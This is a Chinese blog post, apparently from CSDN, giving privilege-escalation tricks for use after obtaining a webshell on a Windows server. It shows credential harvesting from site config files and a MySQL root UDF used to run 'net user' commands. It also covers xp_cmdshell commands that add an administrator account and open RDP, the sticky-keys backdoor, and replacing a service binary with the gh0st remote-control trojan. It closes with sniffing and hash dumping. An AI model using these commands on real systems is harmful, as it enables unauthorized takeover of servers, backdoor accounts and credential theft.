服务器权限提升的一些技巧

最新推荐文章于 2022-11-26 14:08:53 发布
最新推荐文章于 2022-11-26 14:08:53 发布
阅读量1.1k 收藏
点赞数
文章标签: 服务器 数据库 数据库服务器 user database function
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lbuskeep/article/details/6134941
版权

  查找配置文件,翻阅网站目录下的 config.asp config.php conn.asp inc目录查找 具有高权限的账号和密码

  比如说: root 密码 SA的密码。

  // [CH] 以下变量请根据空间商提供的账号参数修改,如有疑问,请联系服务器提供商

  $dbhost = 'localhost';

  // 数据库服务器

  $dbuser = 'root';

  // 数据库用户名

  $dbpw = '123';

  // 数据库密码

  $dbname = 'discuz';

  // 数据库名

  $pconnect = 0;

  // 数据库持久连接 0=关闭, 1=打

  得到root 帐户密码:

  root

  123

  利用MySQL root 提权

  DLL已成功的导出到c://windows//system32//mysqlDll_1269695183.dll

  Function 'state' already exists

  select state("net user yhsafe yhsafe /add")

  SQL语句成功执行:Resource id #2

  Array

  (

  [0] => 命令成功完成。

  succeed!

  [state("net user yhsafe yhsafe /add")] => 命令成功完成。

  succeed!

  )

  利用 SA来提权

  server=localhost;UID=saWD=123;database=masterrovider=SQLOLEDB

  执行xp_cmdshell 假如没有,记得先恢复xp_cmdshell

  Exec master.dbo.xp_cmdshell 'net user yhsafe.com yhsafe /add'

  Exec master.dbo.xp_cmdshell 'net localgroup administrators yhsafe.com /add'

  开启3389:

  Exec master.dbo.xp_cmdshell 'C:/inetpub/wwwroot/bbs/3389.exe 3389'

  返回结果:

  Now opening terminate service...success!

  5.2

  OK...

  开启成功

  2.利用一些软件配置漏洞,或者本地来进行提权。

  "巴西烤肉"提权:

  webshell下执行 ch.exe "net user 123 123 /add"

  360提权:

  360.exe 3389 //这样的话就开启了远程桌面

  按5下shift 就出弹出CMD

  3.替换服务法

  C:/ftp/FtpServer.exe

  对FtpServer.exe 重命名为 FtpServer1.exe

  上传一个反弹的远程控制程序。比方 gh0st

  gh0st 重命名为FtpServer.exe

  4.打破常规用webshell来进行Sniffer

  能Sniffer到整个服务器的FTP HTTP这类密码。

  需要用到Wireshark 专业工具来查看密码。

  5.dump 密码

  dump 需要administrator 甚至 system权限

  dump出hash 进而对内网进一步渗透

蓝图
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
服务器权限提升
甲方乙方
08-12 828
当我们拿到webshell之后,下一步该干什么? 权限提升啊!!! 一、介绍 通过上传、SQL注入、任意代码执行等最初的漏洞利用,攻击者将获得一定的访问权限。接着,攻击者将逐步探查其破坏的系统来获得比最初更多的权限,以期从其他账户访问更多敏感信息,或甚至获得对某个系统的完全管理控制。当攻击者一这种方式扩大其最初的未经授权访问权限时,我们将其行为称之为权限提升攻击。      水平权限提升
权限提升
m0_65332604的博客
04-06 1190
提权,顾名思义就是提高自己在服务器中的权限,就比如在Windows中,你本身登陆的用户是Guest,通过提权后,就会变成超级管理员,拥有了管理Windows的所有权限。以下是常见几种提权方式: 1.Bypass UAC UAC介绍 UAC(UserAccount Control,用户账户控制)简言之就是在Vista及更高版本中通过弹框进一步让用户确认是否授权当前可执行文件来达到阻止恶意程序的目的。 为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC(不进行弹窗直接运
内网渗透常用提权方式总结
j1044957016的博客
06-01 6843
内网菜鸡艰难学习,希望一样的菜鸡能省去打开一堆链接的时间吧
服务器提权常见方法介绍
seek_2022的博客
04-15 6478
文章目录一、提权常见的方法 很多时候渗透测试人员,在做渗透的时候,拿到了网站权限,会发现,网站的权限调用的CMD命令,其实只是网站的权限,并不是服务器管理员权限,这个时候就需要去想办法提升自己的权限,只有自己的权限够了,才可以去更好的做内网测试。 一、提权常见的方法 Windows常用的提权方式有:内核提权、数据库提权、系统配置错误提权、组策略首选项提权、Bypass UAC提权、令牌窃取提权等姿势。 1、windows/linux系统漏洞提权; 查看windows打了什么补丁,然后去网上找存在什么样的漏
【内网渗透】——提权
haoaaao的博客
07-26 697
windwos提权篇
qq_42307546的博客
03-24 2510
查看用户组 可以看到有三个用户组system Lihua administrators system为系统最高权限当我们拿到一个网络服务权限就要提升为system权限 net user 查看当前有哪些用户 查看当前用户以及主机名 whoami 查看用户信息以及所属组 net user 用户名 查询组命令 net localgroup 漏洞提权从图中可以看出这个webshell的权限是iis_users组 提权命令 查看系统系统信息 systeminfo C:\Users\LiHua>sys
java源码包3
04-20
 Java数据压缩与传输实例,可以学习一下实例化套按字、得到文件输入流、压缩输入流、文件输出流、实例化缓冲区、写入数据到文件、关闭输入流、关闭套接字关闭输出流、输出错误信息等Java编程小技巧。 Java数组倒置...
网络安全防护技战法报告.docx
06-10
这个方面的关键目标是通过减少被攻击面来提升攻击门槛,并在受影响前拦截攻击动作。 网络安全防护技战法报告全文共9页,当前为第1页。检测能力:用于发现那些逃过防御网络的攻击,该方面的关键目标是降低威胁造成的...
PostgreSQL 8.2.3 中文文档
06-12
性能提升技巧 III. 服务器管理 14. 安装指导 15. 在 Windows 上安装客户端 16. 操作系统环境 17. 服务器配置 18. 数据库角色和权限 19. 管理数据库 20. 用户认证 21. 区域 22. 日常数据库维护工作 23....
PostgreSQL中文手册9.2
01-04
PostgreSQL PostgreSQL PostgreSQL学习手册 学习手册 学习手册 (性能提升技巧 性能提升技巧 性能提升技巧 ) 46 一、使用 一、使用 EXPLAINEXPLAINEXPLAINEXPLAIN EXPLAIN: 46 PostgreSQL PostgreSQL PostgreSQL学习...
postgresql中文手册
06-09
13. 性能提升技巧 III. 服务器管理 14. 安装指导 15. 在 Windows 上安装客户端 16. 操作系统环境 17. 服务器配置 18. 数据库角色和权限 19. 管理数据库 20. 用户认证 21. 区域 22. 日常数据库维护工作 23...
权限提升-Web权限-MSF自动化
m0_65336233的博客
11-26 1035
简单的提权漏洞讲解
内网渗透总结一:第一步提权
yggcwhat
05-06 2211
内网渗透总结一:第一步提权!!!
怎么提高计算机用户权限,在USER用户下提升自已的权限
ぃ妖气ぅ的博客
06-23 1947
不少上班族都会碰到这样的烦恼,网管关闭了电脑的超级用户权限,除了工作外什么也干不了,上网、聊天都不行,好无聊哦。别着急,今天听雨就教你怎么在USER帐户下提升自已的权限,说白了,就是将自已的USER用户变成管理员用户。首先看一下自已的用户权限,在桌面上右击“我的电脑”,在右键菜单中选“管理”,打开计算机管理对话框,在对话框的左栏中依次双击“本地用户和组”、“用户”,再看右边窗口中就有自已的用户名了...
为用户“NT AUTHORITY/NETWORK SERVICE”授予的权限不足,无法执行此操作。 (rsAccessDenied)
热门推荐
每天都有新发现
06-17 1万+
在VISTA操作系统里建立SQL报表时使用reportview访问报表时提示下面错误: 为用户“NT AUTHORITY/NETWORK SERVICE”授予的权限不足,无法执行此操作。 (rsAccessDenied) 解决方案: 1,在IIS里访问http://localhost/Reports,在属性项里点击“新建角色分配”,在“组或用户名”填入“IIS_IUSRS”,在下面的“
codeigniter ci问题总结mkdir(): Invalid path
11-11 2109
codeigniter ci问题总结 codeigniter Message: mkdir(): Invalid path  Filename: drivers/Session_files_driver.php 原因不明,解决办法: ? 1 $config['sess_save_path'] = NULL;
提权后的MYSQL密码破解
八月的专栏
02-07 841
提权后的MYSQL密码破解 91ri.org注:此方法本是MYSQL密码忘记时的找回办法,拿过来作为渗透时收集常用密码信息的一种办法吧。(个人觉得这种比较简单,一个命令就搞定,得到hash后直接cmd5破解即可) mysql用户密码默认保存在DATA\MYSQL目录下 有三个关键文件: user.frm user.MYD user.MYI 停止mysql服
某著名网站注入后提升权限的一些提示
蓝法典的专栏
03-29 1951
17173网站注入后提升权限的一些提示制作人:丁林QQ:109295766网站:www.22tian.com-------------------------------------------------------------------------------现在网站注入是当今最流行的网站入侵技术了,国内各大网站也都存在注入,或许是觉得这些网站比较大就不会存在漏洞,也没有人去检测他们吧!不要
.NET中提升UAC权限的方法总结
weixin_30516243的博客
10-07 224
【题外话】 从Vista开始,由于增加了UAC(用户账户控制,User Account Control)功能,使得管理员用户平时不再拥有能控制所有功能的管理员权限了,所以在调用很多比较重要的功能时需要提升权限来实现。有时候写的程序需要调用这种权限,那么大概就是分为运行前就提升以及运行后再提升两种,在这里整理如下。 【文章索引】 程序运行前提升权限 程序运行后提升权限 程序中判断...
linux就该这么学
最新发布
09-22
学习Linux时,应该从基础开始,掌握一些必要的概念和操作技巧。首先,了解Linux的起源和发展历程,熟悉它的特点、优势和应用场景。学习Linux的基本操作,如文件系统操作、文件权限管理、进程管理等,可以通过阅读...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

蓝图

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值